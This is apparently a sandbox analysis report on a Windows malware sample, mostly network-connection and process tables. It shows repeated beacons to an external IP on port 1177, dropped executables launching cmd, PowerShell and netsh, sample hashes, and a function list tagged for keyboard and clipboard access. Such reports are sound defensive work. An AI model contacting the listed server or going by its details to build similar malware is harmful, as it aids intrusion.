Jul 1, 2024 10:21:49.238281965 CEST | 1177 | 49162 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:21:49.238344908 CEST | 49162 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:21:49.438510895 CEST | 49162 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:21:49.443491936 CEST | 1177 | 49162 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:21:58.999998093 CEST | 1177 | 49162 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:21:59.000073910 CEST | 49162 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:02.155616045 CEST | 49162 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:02.160375118 CEST | 1177 | 49162 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:03.676212072 CEST | 49163 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:03.681183100 CEST | 1177 | 49163 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:03.681241035 CEST | 49163 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:03.684189081 CEST | 49163 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:03.691059113 CEST | 1177 | 49163 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:13.416788101 CEST | 1177 | 49163 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:13.416848898 CEST | 49163 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:15.915493011 CEST | 49163 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:15.920376062 CEST | 1177 | 49163 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:16.972631931 CEST | 49164 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:16.977458000 CEST | 1177 | 49164 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:16.977514029 CEST | 49164 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:16.980392933 CEST | 49164 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:16.985172033 CEST | 1177 | 49164 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:26.670746088 CEST | 1177 | 49164 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:26.670850992 CEST | 49164 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:29.175703049 CEST | 49164 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:29.180486917 CEST | 1177 | 49164 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:30.423422098 CEST | 49165 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:30.428383112 CEST | 1177 | 49165 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:30.428437948 CEST | 49165 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:30.431062937 CEST | 49165 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:30.436099052 CEST | 1177 | 49165 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:40.173226118 CEST | 1177 | 49165 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:40.173295021 CEST | 49165 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:42.669631004 CEST | 49165 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:42.674647093 CEST | 1177 | 49165 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:43.871829033 CEST | 49166 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:43.876662016 CEST | 1177 | 49166 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:43.876718044 CEST | 49166 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:43.879654884 CEST | 49166 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:43.884468079 CEST | 1177 | 49166 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:53.692430019 CEST | 1177 | 49166 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:53.692595959 CEST | 49166 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:56.210298061 CEST | 49166 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:56.215200901 CEST | 1177 | 49166 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:57.533628941 CEST | 49167 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:57.538625002 CEST | 1177 | 49167 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:22:57.538697004 CEST | 49167 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:57.541620016 CEST | 49167 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:22:57.546746016 CEST | 1177 | 49167 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:07.301902056 CEST | 1177 | 49167 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:07.302130938 CEST | 49167 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:09.836111069 CEST | 49167 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:09.841063023 CEST | 1177 | 49167 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:11.184724092 CEST | 49168 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:11.189582109 CEST | 1177 | 49168 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:11.189645052 CEST | 49168 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:11.211026907 CEST | 49168 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:11.216376066 CEST | 1177 | 49168 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:21.077224016 CEST | 1177 | 49168 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:21.077430010 CEST | 49168 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:23.588432074 CEST | 49168 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:23.593616962 CEST | 1177 | 49168 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:24.893331051 CEST | 49169 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:24.898138046 CEST | 1177 | 49169 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:24.898195028 CEST | 49169 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:24.901144028 CEST | 49169 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:24.906815052 CEST | 1177 | 49169 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:34.700531960 CEST | 1177 | 49169 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:34.700599909 CEST | 49169 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:37.207242012 CEST | 49169 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:37.212090969 CEST | 1177 | 49169 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:38.652074099 CEST | 49170 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:38.658783913 CEST | 1177 | 49170 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:38.658849955 CEST | 49170 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:38.664412975 CEST | 49170 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:38.669179916 CEST | 1177 | 49170 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:48.631632090 CEST | 1177 | 49170 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:48.631793022 CEST | 49170 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:51.138029099 CEST | 49170 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:51.143104076 CEST | 1177 | 49170 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:52.456696987 CEST | 49171 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:52.462095022 CEST | 1177 | 49171 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:23:52.462150097 CEST | 49171 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:52.503012896 CEST | 49171 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:23:52.507802963 CEST | 1177 | 49171 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:02.339181900 CEST | 1177 | 49171 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:02.339241982 CEST | 49171 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:04.850470066 CEST | 49171 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:04.855521917 CEST | 1177 | 49171 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:06.123507977 CEST | 49172 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:06.129070044 CEST | 1177 | 49172 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:06.129123926 CEST | 49172 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:06.132111073 CEST | 49172 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:06.138037920 CEST | 1177 | 49172 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:15.846599102 CEST | 1177 | 49172 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:15.846662998 CEST | 49172 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:18.347311020 CEST | 49172 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:18.353022099 CEST | 1177 | 49172 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:19.562786102 CEST | 49173 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:19.568671942 CEST | 1177 | 49173 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:19.568731070 CEST | 49173 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:19.571507931 CEST | 49173 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:19.577858925 CEST | 1177 | 49173 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:29.287723064 CEST | 1177 | 49173 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:29.287787914 CEST | 49173 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:31.799869061 CEST | 49173 | 1177 | 192.168.2.22 | 192.169.69.25 |
Jul 1, 2024 10:24:31.804816008 CEST | 1177 | 49173 | 192.169.69.25 | 192.168.2.22 |
Jul 1, 2024 10:24:33.169706106 CEST | 49174 | 1177 | 192.168.2.22 | 192.169.69.25 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Target ID: | 0 |
Start time: | 04:21:25 |
Start date: | 01/07/2024 |
Path: | C:\Users\user\Desktop\._cache_1.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 1'178'304 bytes |
MD5 hash: | 62C01F1B2AC0A7BAB6C3B50FD51E6A36 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 1 |
Start time: | 04:21:26 |
Start date: | 01/07/2024 |
Path: | C:\Users\user\AppData\Local\Temp\Tr.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xac0000 |
File size: | 915'456 bytes |
MD5 hash: | 4D3B21451ED0EE3EE65888D4C8944693 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: | |
Reputation: | low |
Has exited: | true |
Target ID: | 2 |
Start time: | 04:21:37 |
Start date: | 01/07/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x4a330000 |
File size: | 345'088 bytes |
MD5 hash: | 5746BD7E255DD6A8AFA06F7C42C1BA41 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 04:21:38 |
Start date: | 01/07/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13faf0000 |
File size: | 443'392 bytes |
MD5 hash: | A575A7610E5F003CC36DF39E07C4BA7D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Reputation: | moderate |
Has exited: | false |
Target ID: | 6 |
Start time: | 04:21:42 |
Start date: | 01/07/2024 |
Path: | C:\Windows\System32\netsh.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xf70000 |
File size: | 87'040 bytes |
MD5 hash: | 637982A421D0133DCEAA0D1490D1DC9C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 7 |
Start time: | 04:21:46 |
Start date: | 01/07/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x4a190000 |
File size: | 345'088 bytes |
MD5 hash: | 5746BD7E255DD6A8AFA06F7C42C1BA41 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 9 |
Start time: | 04:21:46 |
Start date: | 01/07/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13faf0000 |
File size: | 443'392 bytes |
MD5 hash: | A575A7610E5F003CC36DF39E07C4BA7D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Reputation: | moderate |
Has exited: | true |
Target ID: | 11 |
Start time: | 04:21:54 |
Start date: | 01/07/2024 |
Path: | C:\Users\user\AppData\Local\Temp\x.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 1'178'304 bytes |
MD5 hash: | 62C01F1B2AC0A7BAB6C3B50FD51E6A36 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: | |
Reputation: | low |
Has exited: | false |
Target ID: | 12 |
Start time: | 04:21:55 |
Start date: | 01/07/2024 |
Path: | C:\Users\user\AppData\Local\Temp\Tr.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x3a0000 |
File size: | 915'456 bytes |
MD5 hash: | 4D3B21451ED0EE3EE65888D4C8944693 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Execution Graph
Execution Coverage: | 3.2% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 9.8% |
Total number of Nodes: | 2000 |
Total number of Limit Nodes: | 26 |
Graph
Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178 | file, string | COMMON
Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144 | window | COMMON
Function 0044BF8B Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 92 | file | COMMON
Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12 | library, loader | COMMON
Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28 | file | COMMON
Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4 | COMMON
Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837 | window, sleep | COMMON
Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343 | COMMON
Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173 | COMMON
Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76 | window, registry | COMMON
Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136 | window, time, registry | COMMON
Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79 | registry | COMMON
Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66 | registry | COMMON
Function 004102B0 Relevance: 7.6, APIs: 5, Instructions: 87 | COMMON
Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130 | COMMON
Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38 | COMMON
Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31 | window | COMMON
Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92 | COMMON
Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74 | COMMON
Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26 | COMMON
Function 0040F4E0 Relevance: 3.0, APIs: 2, Instructions: 23 | COMMON
Function 0045C730 Relevance: 1.6, APIs: 1, Instructions: 102 | COMMON
Function 00443D19 Relevance: 1.5, APIs: 1, Instructions: 36 | COMMON
Function 004142B6 Relevance: 1.5, APIs: 1, Instructions: 34 | COMMON
Function 00432017 Relevance: 1.5, APIs: 1, Instructions: 26 | COMMON
Function 00433998 Relevance: 1.5, APIs: 1, Instructions: 15 | COMMON
Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10 | COMMON
Function 00472663 Relevance: 1.5, APIs: 1, Instructions: 8 | COMMON
Function 00466FAF Relevance: 1.3, APIs: 1, Instructions: 29 | COMMON
Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674 | window, keyboard | COMMON
Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133 | keyboard, thread, window | COMMON
Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234 | process | COMMON
Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413 | COMMON
Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217 | time, file | COMMON
Function 00464EAE Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 193 | thread | COMMON
Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139 | file | COMMON
Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377 | time | COMMON
Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135 | file | COMMON
Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86 | shutdown | COMMON
Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182 | COMMON
Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122 | COMMON
Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120 | clipboard, memory | COMMON
Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128 | file, sleep | COMMON
Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58 | COMMON LIBRARY CODE
Function 0046CEF3 Relevance: 9.2, APIs: 6, Instructions: 231 | com | COMMON
Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71 | window | COMMON
Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130 | file | COMMON
Function 0045DE8F Relevance: 3.1, APIs: 2, Instructions: 55 | file | COMMON
Function 0044AF6C Relevance: 3.0, APIs: 2, Instructions: 34 | window | COMMON
Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502 | COMMON
Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22 | COMMON
Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7 | COMMON
Function 0040FA10 Relevance: 0.6, Instructions: 607 | COMMON
Function 004129D0 Relevance: 0.4, Instructions: 355 | COMMON
Function 004125E8 Relevance: 0.3, Instructions: 349 | COMMON
Function 00412216 Relevance: 0.3, Instructions: 332 | COMMON
Function 00411E78 Relevance: 0.3, Instructions: 326 | COMMON
Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490 | file, window, com | COMMON
Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275 | COMMON
Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291 | window | COMMON
Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108 | COMMON
Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415 | registry | COMMON
Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291 | window | COMMON
Function 00454E8D Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 213 | window, library | COMMON
Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313 | window, time | COMMON
Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045DF23 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 190timeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00458EAB Relevance: 25.6, APIs: 17, Instructions: 117COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00470E96 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 185windowfileCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00436F47 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 111threadCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
